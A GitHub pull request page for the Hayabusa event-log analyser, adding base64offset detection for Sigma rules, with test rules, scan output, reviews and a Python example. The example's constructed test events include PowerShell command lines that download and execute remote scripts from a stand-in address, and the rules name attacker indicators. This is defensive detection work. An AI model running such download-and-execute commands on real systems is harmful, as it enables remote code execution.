
Added support for |base64offset|contains pipe keyword #926

Merged

Conversation

@hitenkoku hitenkoku (Collaborator) commented Feb 17, 2023

What Changed

  • added support for |base64offset|contains pipe keyword

Evidence

I created the following rule (the rule was suggested by @YamatoSecurity. Many thanks.) and ran the command ./hayabusa.exe csv-timeline -o output.csv -q -r <following rule file path>.

title: base64offset contains test
status: test
description: test for base64offset
detection:
  selection1:
    - CommandLine|base64offset|contains: "http://"
    - CommandLine|base64offset|contains: "https://"
  selection2:
    CommandLine|base64offset|contains: "::FromBase64String"
  selection3:
    CommandLine|base64offset|contains: "powershell"
  condition: selection1 or selection2 or selection3
falsepositives:
  - Unknown
level: high
for [hayabusa-sample-evtx](https:/Yamato-Security/hayabusa-sample-evtx/commit/8367ec2115aa5b3daed782f7e8d2a21843be3614)
>./705.exe csv-timeline -d ..\hayabusa-sample-evtx\ -r .\testbase64.yml -o 705.csv -q
...
Analyzing event files: 584
Total file size: 137.1 MB

Loading detections rules. Please wait.


Test rules: 1 (100.00%)

Other rules: 1
Total enabled detection rules: 1

Scanning in progress. Please wait.

584 / 584 [==========================================================================] 100.00 %

Analysis finished. Please wait while the results are being saved.

Results Summary:

Events with hits / Total events: 4 / 47,472 (Data reduction: 47,468 events (99.99%))

Total | Unique detections: 4 | 1
Total | Unique critical detections: 0 (0.00%) | 0 (0.00%)
Total | Unique high detections: 4 (100.00%) | 1 (100.00%)
Total | Unique medium detections: 0 (0.00%) | 0 (0.00%)
Total | Unique low detections: 0 (0.00%) | 0 (0.00%)
Total | Unique informational detections: 0 (0.00%) | 0 (0.00%)

Dates with most total detections:
critical: n/a, high: 2020-08-02 (3), medium: n/a, low: n/a, informational: n/a

Top 5 computers with most unique detections:
critical: n/a
high: IE10Win7 (1), mssql01.offsec.lan (1)
medium: n/a
low: n/a
informational: n/a

╭────────────────────────────────────────────────────────────╮
│ Top critical alerts:        Top high alerts:               │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ n/a                         base64offset contains test (4) │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ Top medium alerts:          Top low alerts:                │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ Top informational alerts:                                  │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
╰───────────────────────────╌────────────────────────────────╯

Saved file: 705.csv (7.5 KB)
Elapsed time: 00:00:01.163
6.1 GB evtx files in https://issues/778#issuecomment-1296504766
>./705.exe csv-timeline -d ..\all-evtx\ -r .\testbase64.yml -o 705.csv -q
...
Analyzing event files: 1858
Total file size: 6.1 GB

Loading detections rules. Please wait.


Test rules: 1 (100.00%)

Other rules: 1
Total enabled detection rules: 1

Scanning in progress. Please wait.

1858 / 1858 [========================================================================] 100.00 %

Analysis finished. Please wait while the results are being saved.

Results Summary:

Events with hits / Total events: 3 / 4,817,181 (Data reduction: 4,817,178 events (100.00%))

Total | Unique detections: 3 | 1
Total | Unique critical detections: 0 (0.00%) | 0 (0.00%)
Total | Unique high detections: 3 (100.00%) | 1 (100.00%)
Total | Unique medium detections: 0 (0.00%) | 0 (0.00%)
Total | Unique low detections: 0 (0.00%) | 0 (0.00%)
Total | Unique informational detections: 0 (0.00%) | 0 (0.00%)

Dates with most total detections:
critical: n/a, high: 2022-03-03 (2), medium: n/a, low: n/a, informational: n/a

Top 5 computers with most unique detections:
critical: n/a
high: DESKTOP-6D0DBMB (1), evtx-PC (1)
medium: n/a
low: n/a
informational: n/a

╭────────────────────────────────────────────────────────────╮
│ Top critical alerts:        Top high alerts:               │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ n/a                         base64offset contains test (3) │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ Top medium alerts:          Top low alerts:                │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ Top informational alerts:                                  │
├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
│ n/a                         n/a                            │
╰───────────────────────────╌────────────────────────────────╯

Saved file: 705.csv (8.8 KB)
Elapsed time: 00:00:42.309

@hitenkoku hitenkoku added the enhancement New feature or request label Feb 17, 2023
@hitenkoku hitenkoku self-assigned this Feb 17, 2023
@hitenkoku hitenkoku force-pushed the 705-support-field_base64offset-contains-aggregator branch from 16c5229 to a9889d6 Compare February 17, 2023 10:17
codecov bot commented Feb 17, 2023

Codecov Report

Base: 74.82% // Head: 74.92% // Increases project coverage by +0.09% 🎉

Coverage data is based on head (e9b7f9e) compared to base (ed6bd86).
Patch coverage: 92.30% of modified lines in pull request are covered.

Additional details and impacted files
@@            Coverage Diff             @@
##             main     #926      +/-   ##
==========================================
+ Coverage   74.82%   74.92%   +0.09%     
==========================================
  Files          24       24              
  Lines       15935    16034      +99     
==========================================
+ Hits        11924    12013      +89     
- Misses       4011     4021      +10     
Impacted files (coverage, patch coverage, Δ):
src/detections/rule/matchers.rs: 96.20%, patch 92.30%, -0.33% ⬇️


@hitenkoku hitenkoku linked an issue Feb 17, 2023 that may be closed by this pull request
@fukusuket fukusuket (Collaborator) left a comment

I tested with the following detection logs containing base64 strings:

./hayabusa csv-timeline -f ./hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx -r ./rules/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string.yml

The rule used for testing is as follows:

title: base64offset contains test
status: test
description: test for base64offset
detection:
    SELECTION_1:
        Channel: Microsoft-Windows-Sysmon/Operational
    SELECTION_2:
        CommandLine|base64offset|contains: '$XX=IEX'
    condition: SELECTION_1 and SELECTION_2
falsepositives:
    - Unknown
level: high

I confirmed that the string after base64 decoding can be detected.
LGTM!🚀
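The two test rules above (the PR description's three selections and the reviewer's `$XX=IEX` rule) only show that the modifier fires; they do not show what `|base64offset|contains` actually searches for. The following is an added example, not Hayabusa's code and not the matchers.rs change in this PR: it reproduces the Sigma `base64offset` semantics in Python (encode the needle at the three possible byte alignments, strip the leading and trailing base64 characters that also encode bits of unknown neighbouring bytes, then do a plain substring match), runs both rules through a deliberately minimal evaluator that understands only the modifiers used on this page and flat `and`/`or` conditions, and feeds it constructed command lines. The sample events, the 10.0.0.5 addresses, and the rule-evaluator shape are assumptions for illustration; `wide` meaning UTF-16LE is Sigma's definition of that modifier.

```python
import base64
from typing import Any, Dict, List

# Slice bounds from the Sigma base64offset definition: leading chars depend on how many
# bytes were prepended (0, 1, 2), trailing chars on (prepended + len(value)) % 3; both
# encode bits of unknown neighbouring bytes, so they are dropped.
_START = (0, 2, 3)
_END = (None, -3, -2)


def base64offset_variants(value: str, wide: bool = False) -> List[str]:
    """Three base64 fragments that match `value` at any 3-byte alignment.
    wide=True mirrors Sigma's |wide|base64offset (UTF-16LE first), which is the
    encoding a PowerShell -EncodedCommand payload actually has."""
    raw = value.encode("utf-16le" if wide else "utf-8")
    return [
        base64.b64encode(b" " * i + raw).decode("ascii")[_START[i]:_END[(len(raw) + i) % 3]]
        for i in range(3)
    ]


def base64offset_contains(field_value: str, needle: str, wide: bool = False) -> bool:
    """field|base64offset|contains: needle, applied to one field value."""
    return any(v and v in field_value for v in base64offset_variants(needle, wide))


def _match_field(event: Dict[str, Any], key: str, expected: Any) -> bool:
    # Only the modifiers this page uses: (wide|)base64offset|contains, contains,
    # and plain equality. A list of values is an OR.
    field, *mods = key.split("|")
    actual = str(event.get(field, ""))
    for exp in (expected if isinstance(expected, list) else [expected]):
        if "base64offset" in mods:
            if base64offset_contains(actual, exp, wide="wide" in mods):
                return True
        elif "contains" in mods:
            if exp in actual:
                return True
        elif actual == exp:
            return True
    return False


def _match_selection(event: Dict[str, Any], selection: Any) -> bool:
    if isinstance(selection, list):  # YAML list of maps: any map may match
        return any(_match_selection(event, s) for s in selection)
    return all(_match_field(event, k, v) for k, v in selection.items())


def evaluate_rule(rule: Dict[str, Any], event: Dict[str, Any]) -> bool:
    """Evaluate a flat condition ("a or b", "a and b") left to right, no parentheses."""
    det = rule["detection"]
    result, op = None, "or"
    for tok in det["condition"].split():
        if tok in ("and", "or"):
            op = tok
            continue
        hit = _match_selection(event, det[tok])
        result = hit if result is None else (result and hit if op == "and" else result or hit)
    return bool(result)


def run_rule(rule: Dict[str, Any], events: List[Dict[str, Any]]) -> Dict[str, bool]:
    return {e["id"]: evaluate_rule(rule, e) for e in events}


# The PR's test rule and the reviewer's rule, transcribed from their YAML (no PyYAML needed).
PR_RULE = {"title": "base64offset contains test", "detection": {
    "selection1": [{"CommandLine|base64offset|contains": "http://"},
                   {"CommandLine|base64offset|contains": "https://"}],
    "selection2": {"CommandLine|base64offset|contains": "::FromBase64String"},
    "selection3": {"CommandLine|base64offset|contains": "powershell"},
    "condition": "selection1 or selection2 or selection3"}}
REVIEW_RULE = {"title": "base64offset contains test", "detection": {
    "SELECTION_1": {"Channel": "Microsoft-Windows-Sysmon/Operational"},
    "SELECTION_2": {"CommandLine|base64offset|contains": "$XX=IEX"},
    "condition": "SELECTION_1 and SELECTION_2"}}


def _b64(text: str, wide: bool = False) -> str:
    return base64.b64encode(text.encode("utf-16le" if wide else "utf-8")).decode("ascii")


SYSMON = "Microsoft-Windows-Sysmon/Operational"
# Constructed sample events (assumed for this example, not from hayabusa-sample-evtx).
SAMPLE_EVENTS = [
    # ASCII payload hidden in base64: carries "http://" and "powershell".
    {"id": "stager", "Channel": SYSMON, "CommandLine":
        "powershell.exe -nop -w hidden -c \"IEX([Text.Encoding]::ASCII.GetString("
        "[Convert]::FromBase64String('" + _b64(
            "powershell -c (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')")
        + "')))\""},
    # Base64 blob whose decoded text starts with the reviewer's needle $XX=IEX.
    {"id": "xx_iex", "Channel": SYSMON, "CommandLine": "cmd.exe /c echo " + _b64(
        "$XX=IEX;$XX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/c.ps1')")},
    {"id": "benign", "Channel": SYSMON, "CommandLine": "notepad.exe C:\\Users\\alice\\notes.txt"},
    # -EncodedCommand payload is UTF-16LE: the non-wide variants never occur in it.
    {"id": "encoded", "Channel": SYSMON, "CommandLine":
        "powershell.exe -enc " + _b64("iwr https://10.0.0.5/b.ps1 | iex", wide=True)},
]

if __name__ == "__main__":
    print(base64offset_variants("http://"))   # the three fragments the rule really searches for
    print(run_rule(PR_RULE, SAMPLE_EVENTS))
    print(run_rule(REVIEW_RULE, SAMPLE_EVENTS))
```

Two things the runs make visible that the rule text alone does not: the "stager" command line contains `::FromBase64String` in clear text, yet selection2 does not fire, because `base64offset` only ever matches the encoded forms of its value (a clear-text match needs a separate plain `contains`); and the `-enc` event is missed by the PR's rule even though its decoded payload contains `https://`, because that payload is UTF-16LE and the rule lacks the `wide` modifier that Sigma rules use for PowerShell encoded commands.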

@YamatoSecurity YamatoSecurity (Collaborator) left a comment

I was able to confirm this is working as expected as well. Thank you!

@YamatoSecurity YamatoSecurity merged commit 912cd00 into main Feb 18, 2023
@hitenkoku hitenkoku deleted the 705-support-field_base64offset-contains-aggregator branch February 28, 2023 14:14
Labels: enhancement (New feature or request)
Linked issue that may be closed by this pull request: Support Field|base64offset|contains: aggregator
3 participants